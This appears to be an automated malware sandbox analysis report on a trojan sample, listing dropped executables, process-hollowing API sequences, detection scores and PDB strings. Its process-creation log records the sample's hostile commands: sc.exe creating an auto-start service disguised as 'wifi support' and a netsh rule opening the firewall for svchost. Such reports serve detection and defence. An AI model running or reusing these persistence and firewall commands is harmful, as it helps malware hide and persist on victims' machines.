Source: C:\Windows\System32\svchost.exe	Section loaded: cdpsgshims.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: windowscoredeviceinfo.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: windowscoredeviceinfo.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: windowscoredeviceinfo.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: windowscoredeviceinfo.dll
Source: C:\Users\user\AppData\Local\Temp\13E2.exe	Section loaded: mscorjit.dll

Source: emPJndhuvA.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED

Source: C:\Windows\System32\svchost.exe

File deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\IdentityCRL\production\tmpconfig.xml

Jump to behavior

Source: C:\Windows\System32\svchost.exe

File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Jump to behavior

Source: C:\Users\user\Desktop\emPJndhuvA.exe	Code function: String function: 00404944 appears 44 times
Source: C:\Users\user\AppData\Local\Temp\FD2B.exe	Code function: String function: 004048D0 appears 460 times
Source: C:\Users\user\AppData\Local\Temp\3D67.exe	Code function: String function: 00404BF4 appears 43 times
Source: C:\Users\user\AppData\Local\Temp\952.exe	Code function: String function: 0040EE2A appears 40 times
Source: C:\Users\user\AppData\Local\Temp\952.exe	Code function: String function: 00402544 appears 53 times

Source: C:\Users\user\Desktop\emPJndhuvA.exe	Code function: 0_2_00530110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess,
Source: C:\Users\user\Desktop\emPJndhuvA.exe	Code function: 1_2_00401962 Sleep,NtTerminateProcess,
Source: C:\Users\user\Desktop\emPJndhuvA.exe	Code function: 1_2_0040196D Sleep,NtTerminateProcess,
Source: C:\Users\user\Desktop\emPJndhuvA.exe	Code function: 1_2_00402000 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
Source: C:\Users\user\Desktop\emPJndhuvA.exe	Code function: 1_2_0040250A NtEnumerateKey,NtEnumerateKey,NtClose,
Source: C:\Users\user\Desktop\emPJndhuvA.exe	Code function: 1_2_00401A0B NtTerminateProcess,
Source: C:\Users\user\Desktop\emPJndhuvA.exe	Code function: 1_2_0040201A NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
Source: C:\Users\user\Desktop\emPJndhuvA.exe	Code function: 1_2_0040201E NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
Source: C:\Users\user\Desktop\emPJndhuvA.exe	Code function: 1_2_0040202D NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
Source: C:\Users\user\Desktop\emPJndhuvA.exe	Code function: 1_2_00402084 LocalAlloc,NtQuerySystemInformation,
Source: C:\Users\user\Desktop\emPJndhuvA.exe	Code function: 1_2_00402491 NtOpenKey,
Source: C:\Users\user\Desktop\emPJndhuvA.exe	Code function: 1_1_00402000 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
Source: C:\Users\user\Desktop\emPJndhuvA.exe	Code function: 1_1_0040250A NtEnumerateKey,NtEnumerateKey,NtClose,
Source: C:\Users\user\Desktop\emPJndhuvA.exe	Code function: 1_1_0040201A NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
Source: C:\Users\user\Desktop\emPJndhuvA.exe	Code function: 1_1_0040201E NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
Source: C:\Users\user\Desktop\emPJndhuvA.exe	Code function: 1_1_0040202D NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
Source: C:\Users\user\Desktop\emPJndhuvA.exe	Code function: 1_1_00402084 LocalAlloc,NtQuerySystemInformation,
Source: C:\Users\user\Desktop\emPJndhuvA.exe	Code function: 1_1_00402491 NtOpenKey,
Source: C:\Users\user\AppData\Roaming\tiftjuh	Code function: 20_2_00460110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess,
Source: C:\Users\user\AppData\Roaming\tiftjuh	Code function: 21_2_00401962 Sleep,NtTerminateProcess,
Source: C:\Users\user\AppData\Roaming\tiftjuh	Code function: 21_2_0040196D Sleep,NtTerminateProcess,
Source: C:\Users\user\AppData\Roaming\tiftjuh	Code function: 21_2_00402000 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
Source: C:\Users\user\AppData\Roaming\tiftjuh	Code function: 21_2_0040250A NtEnumerateKey,NtEnumerateKey,NtClose,
Source: C:\Users\user\AppData\Roaming\tiftjuh	Code function: 21_2_00401A0B NtTerminateProcess,
Source: C:\Users\user\AppData\Roaming\tiftjuh	Code function: 21_2_0040201A NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
Source: C:\Users\user\AppData\Roaming\tiftjuh	Code function: 21_2_0040201E NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
Source: C:\Users\user\AppData\Roaming\tiftjuh	Code function: 21_2_0040202D NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
Source: C:\Users\user\AppData\Roaming\tiftjuh	Code function: 21_2_00402084 LocalAlloc,NtQuerySystemInformation,
Source: C:\Users\user\AppData\Roaming\tiftjuh	Code function: 21_2_00402491 NtOpenKey,
Source: C:\Users\user\AppData\Local\Temp\3D67.exe	Code function: 25_2_00460110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess,
Source: C:\Users\user\AppData\Local\Temp\3D67.exe	Code function: 28_2_00401962 Sleep,NtTerminateProcess,
Source: C:\Users\user\AppData\Local\Temp\3D67.exe	Code function: 28_2_0040196D Sleep,NtTerminateProcess,
Source: C:\Users\user\AppData\Local\Temp\3D67.exe	Code function: 28_2_00402000 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
Source: C:\Users\user\AppData\Local\Temp\3D67.exe	Code function: 28_2_0040250A NtEnumerateKey,NtEnumerateKey,NtClose,
Source: C:\Users\user\AppData\Local\Temp\3D67.exe	Code function: 28_2_00401A0B NtTerminateProcess,
Source: C:\Users\user\AppData\Local\Temp\3D67.exe	Code function: 28_2_0040201A NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
Source: C:\Users\user\AppData\Local\Temp\3D67.exe	Code function: 28_2_0040201E NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
Source: C:\Users\user\AppData\Local\Temp\3D67.exe	Code function: 28_2_0040202D NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
Source: C:\Users\user\AppData\Local\Temp\3D67.exe	Code function: 28_2_00402084 LocalAlloc,NtQuerySystemInformation,
Source: C:\Users\user\AppData\Local\Temp\3D67.exe	Code function: 28_2_00402491 NtOpenKey,

Source: C:\Users\user\AppData\Local\Temp\952.exe

Code function: 30_2_00408E26: CreateFileW,DeviceIoControl,CloseHandle,

Source: emPJndhuvA.exe	Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: 45F8.exe.3.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: 2819.exe.3.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: 3D67.exe.3.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: FD2B.exe.3.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: 952.exe.3.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: CA61.exe.3.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: tiftjuh.3.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: vodibdaj.exe.30.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS

Source: 9054.exe.3.dr	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESERVED size: 0x100000 address: 0x0
Source: B1F6.exe.3.dr	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESERVED size: 0x100000 address: 0x0

Source: 6B74.exe.3.dr	Static PE information: Section: .rsrc ZLIB complexity 0.996205570134
Source: 7E61.exe.3.dr	Static PE information: Section: .rsrc ZLIB complexity 0.996201842796
Source: 9054.exe.3.dr	Static PE information: Section: ZLIB complexity 1.00044194799
Source: 9054.exe.3.dr	Static PE information: Section: ZLIB complexity 1.00537109375
Source: B1F6.exe.3.dr	Static PE information: Section: ZLIB complexity 1.00044194799
Source: B1F6.exe.3.dr	Static PE information: Section: ZLIB complexity 1.00537109375

Source: emPJndhuvA.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Roaming\tiftjuh

Jump to behavior

Source: classification engine

Classification label: mal100.troj.evad.winEXE@61/41@91/14

Source: C:\Users\user\AppData\Local\Temp\952.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\952.exe

Code function: 30_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,

Source: C:\Users\user\AppData\Local\Temp\952.exe

Source: emPJndhuvA.exe	Virustotal: Detection: 40%
Source: emPJndhuvA.exe	ReversingLabs: Detection: 65%

Source: C:\Users\user\Desktop\emPJndhuvA.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: unknown	Process created: C:\Users\user\Desktop\emPJndhuvA.exe "C:\Users\user\Desktop\emPJndhuvA.exe"
Source: C:\Users\user\Desktop\emPJndhuvA.exe	Process created: C:\Users\user\Desktop\emPJndhuvA.exe "C:\Users\user\Desktop\emPJndhuvA.exe"
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
Source: unknown	Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
Source: unknown	Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
Source: unknown	Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
Source: unknown	Process created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
Source: unknown	Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k netsvcs -p
Source: unknown	Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown	Process created: C:\Users\user\AppData\Roaming\tiftjuh C:\Users\user\AppData\Roaming\tiftjuh
Source: C:\Users\user\AppData\Roaming\tiftjuh	Process created: C:\Users\user\AppData\Roaming\tiftjuh C:\Users\user\AppData\Roaming\tiftjuh
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\2819.exe C:\Users\user\AppData\Local\Temp\2819.exe
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\3D67.exe C:\Users\user\AppData\Local\Temp\3D67.exe
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 3104 -ip 3104
Source: C:\Users\user\AppData\Local\Temp\2819.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3104 -s 540
Source: C:\Users\user\AppData\Local\Temp\3D67.exe	Process created: C:\Users\user\AppData\Local\Temp\3D67.exe C:\Users\user\AppData\Local\Temp\3D67.exe
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\FD2B.exe C:\Users\user\AppData\Local\Temp\FD2B.exe
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\952.exe C:\Users\user\AppData\Local\Temp\952.exe
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\13E2.exe C:\Users\user\AppData\Local\Temp\13E2.exe
Source: C:\Users\user\AppData\Local\Temp\952.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\bhlprady\
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\952.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\vodibdaj.exe" C:\Windows\SysWOW64\bhlprady\
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\952.exe	Process created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe" create bhlprady binPath= "C:\Windows\SysWOW64\bhlprady\vodibdaj.exe /d\"C:\Users\user\AppData\Local\Temp\952.exe\"" type= own start= auto DisplayName= "wifi support
Source: C:\Windows\SysWOW64\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\952.exe	Process created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe" description bhlprady "wifi internet conection
Source: C:\Windows\SysWOW64\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\952.exe	Process created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" start bhlprady
Source: C:\Windows\SysWOW64\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\952.exe	Process created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
Source: unknown	Process created: C:\Windows\SysWOW64\bhlprady\vodibdaj.exe C:\Windows\SysWOW64\bhlprady\vodibdaj.exe /d"C:\Users\user\AppData\Local\Temp\952.exe"
Source: C:\Windows\SysWOW64\netsh.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\bhlprady\vodibdaj.exe	Process created: C:\Windows\SysWOW64\svchost.exe svchost.exe
Source: C:\Windows\System32\svchost.exe	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\13E2.exe	Process created: C:\Users\user\AppData\Local\Temp\13E2.exe C:\Users\user\AppData\Local\Temp\13E2.exe
Source: C:\Users\user\Desktop\emPJndhuvA.exe	Process created: C:\Users\user\Desktop\emPJndhuvA.exe "C:\Users\user\Desktop\emPJndhuvA.exe"
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\2819.exe C:\Users\user\AppData\Local\Temp\2819.exe
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\3D67.exe C:\Users\user\AppData\Local\Temp\3D67.exe
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\FD2B.exe C:\Users\user\AppData\Local\Temp\FD2B.exe
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\952.exe C:\Users\user\AppData\Local\Temp\952.exe
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\13E2.exe C:\Users\user\AppData\Local\Temp\13E2.exe
Source: C:\Windows\System32\svchost.exe	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
Source: C:\Users\user\AppData\Roaming\tiftjuh	Process created: C:\Users\user\AppData\Roaming\tiftjuh C:\Users\user\AppData\Roaming\tiftjuh
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 3104 -ip 3104
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3104 -s 540
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\3D67.exe	Process created: C:\Users\user\AppData\Local\Temp\3D67.exe C:\Users\user\AppData\Local\Temp\3D67.exe
Source: C:\Windows\SysWOW64\WerFault.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\952.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\bhlprady\
Source: C:\Users\user\AppData\Local\Temp\952.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\vodibdaj.exe" C:\Windows\SysWOW64\bhlprady\
Source: C:\Users\user\AppData\Local\Temp\952.exe	Process created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe" create bhlprady binPath= "C:\Windows\SysWOW64\bhlprady\vodibdaj.exe /d\"C:\Users\user\AppData\Local\Temp\952.exe\"" type= own start= auto DisplayName= "wifi support
Source: C:\Users\user\AppData\Local\Temp\952.exe	Process created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe" description bhlprady "wifi internet conection
Source: C:\Users\user\AppData\Local\Temp\952.exe	Process created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" start bhlprady
Source: C:\Users\user\AppData\Local\Temp\952.exe	Process created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
Source: C:\Users\user\AppData\Local\Temp\13E2.exe	Process created: C:\Users\user\AppData\Local\Temp\13E2.exe C:\Users\user\AppData\Local\Temp\13E2.exe
Source: C:\Windows\SysWOW64\bhlprady\vodibdaj.exe	Process created: C:\Windows\SysWOW64\svchost.exe svchost.exe

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Local\Temp\2819.tmp

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\952.exe

Code function: 30_2_00406A60 lstrcatA,CreateFileA,GetDiskFreeSpaceA,GetLastError,CloseHandle,CloseHandle,FindCloseChangeNotification,GetLastError,CloseHandle,DeleteFileA,GetLastError,

Source: C:\Users\user\AppData\Local\Temp\13E2.exe

Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll

Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \BaseNamedObjects\Local\SM0:5736:64:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6260:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6436:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6384:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6168:120:WilError_01
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3104
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6332:120:WilError_01

Source: 13E2.exe.3.dr, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 13E2.exe.3.dr, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 32.0.13E2.exe.c80000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 32.0.13E2.exe.c80000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 32.0.13E2.exe.c80000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 32.0.13E2.exe.c80000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 32.2.13E2.exe.c80000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 32.2.13E2.exe.c80000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 32.0.13E2.exe.c80000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 32.0.13E2.exe.c80000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 32.0.13E2.exe.c80000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 32.0.13E2.exe.c80000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs	Cryptographic APIs: 'CreateDecryptor'

Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\AppData\Local\Temp\2819.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Source: emPJndhuvA.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: profapi.pdb source: WerFault.exe, 0000001B.00000003.381546423.0000000005806000.00000004.00000040.sdmp
Source:	Binary string: C:\vop\voyik\vugibecibimin23_hafi\marayu\gahexa.pdb source: 2819.exe, 00000016.00000000.348562532.0000000000413000.00000002.00020000.sdmp, 2819.exe, 00000016.00000000.361993606.0000000000413000.00000002.00020000.sdmp, WerFault.exe, 0000001B.00000002.426093244.0000000005790000.00000002.00020000.sdmp
Source:	Binary string: wgdi32full.pdb source: WerFault.exe, 0000001B.00000003.381484904.00000000056A1000.00000004.00000001.sdmp
Source:	Binary string: wkernel32.pdb source: WerFault.exe, 0000001B.00000003.370138407.00000000035D5000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.370897133.00000000035D5000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.381484904.00000000056A1000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.369939315.00000000035D5000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.369869588.0000000005387000.00000004.00000001.sdmp
Source:	Binary string: C:\tececa\sidexivuheje-vewa\xilo.pdb source: FD2B.exe, 0000001D.00000000.369230525.0000000000413000.00000002.00020000.sdmp
Source:	Binary string: sechost.pdb source: WerFault.exe, 0000001B.00000003.381514113.0000000005800000.00000004.00000040.sdmp
Source:	Binary string: profapi.pdb, source: WerFault.exe, 0000001B.00000003.381546423.0000000005806000.00000004.00000040.sdmp
Source:	Binary string: ucrtbase.pdb source: WerFault.exe, 0000001B.00000003.381484904.00000000056A1000.00000004.00000001.sdmp
Source:	Binary string: msvcrt.pdb source: WerFault.exe, 0000001B.00000003.381484904.00000000056A1000.00000004.00000001.sdmp
Source:	Binary string: wrpcrt4.pdb source: WerFault.exe, 0000001B.00000003.381514113.0000000005800000.00000004.00000040.sdmp
Source:	Binary string: wntdll.pdb source: WerFault.exe, 0000001B.00000003.370128323.00000000035CF000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.381484904.00000000056A1000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.371827770.00000000035CF000.00000004.00000001.sdmp
Source:	Binary string: wrpcrt4.pdbk source: WerFault.exe, 0000001B.00000003.381514113.0000000005800000.00000004.00000040.sdmp
Source:	Binary string: shcore.pdb source: WerFault.exe, 0000001B.00000003.381546423.0000000005806000.00000004.00000040.sdmp
Source:	Binary string: powrprof.pdb source: WerFault.exe, 0000001B.00000003.381546423.0000000005806000.00000004.00000040.sdmp
Source:	Binary string: C:\xobar.pdb source: emPJndhuvA.exe, 00000000.00000000.240583523.0000000000413000.00000002.00020000.sdmp, emPJndhuvA.exe, 00000000.00000002.249053095.0000000000413000.00000002.00020000.sdmp, tiftjuh, 00000014.00000002.348231795.0000000000413000.00000002.00020000.sdmp, tiftjuh, 00000014.00000000.339134972.0000000000413000.00000002.00020000.sdmp
Source:	Binary string: wsspicli.pdbk source: WerFault.exe, 0000001B.00000003.381514113.0000000005800000.00000004.00000040.sdmp
Source:	Binary string: wgdi32.pdb source: WerFault.exe, 0000001B.00000003.381484904.00000000056A1000.00000004.00000001.sdmp
Source:	Binary string: !C:\tececa\sidexivuheje-vewa\xilo.pdb source: FD2B.exe, 0000001D.00000000.369230525.0000000000413000.00000002.00020000.sdmp
Source:	Binary string: fltLib.pdb source: WerFault.exe, 0000001B.00000003.381546423.0000000005806000.00000004.00000040.sdmp
Source:	Binary string: advapi32.pdb source: WerFault.exe, 0000001B.00000003.381484904.00000000056A1000.00000004.00000001.sdmp
Source:	Binary string: wsspicli.pdb source: WerFault.exe, 0000001B.00000003.381514113.0000000005800000.00000004.00000040.sdmp
Source:	Binary string: shell32.pdb source: WerFault.exe, 0000001B.00000003.381546423.0000000005806000.00000004.00000040.sdmp
Source:	Binary string: C:\xanofa_towefogeximazu14\pexezi.pdb source: 952.exe, 0000001E.00000000.377588142.0000000000413000.00000002.00020000.sdmp, 952.exe, 0000001E.00000002.411047580.0000000000415000.00000002.00020000.sdmp, 952.exe, 0000001E.00000002.412892690.000000000078E000.00000004.00000020.sdmp, vodibdaj.exe, 0000002C.00000002.417553975.0000000000415000.00000002.00020000.sdmp, vodibdaj.exe, 0000002C.00000000.410165613.0000000000413000.00000002.00020000.sdmp
Source:	Binary string: msvcr100.i386.pdb source: WerFault.exe, 0000001B.00000003.381514113.0000000005800000.00000004.00000040.sdmp
Source:	Binary string: Kernel.Appcore.pdb source: WerFault.exe, 0000001B.00000003.381546423.0000000005806000.00000004.00000040.sdmp
Source:	Binary string: msvcp_win.pdb source: WerFault.exe, 0000001B.00000003.381484904.00000000056A1000.00000004.00000001.sdmp
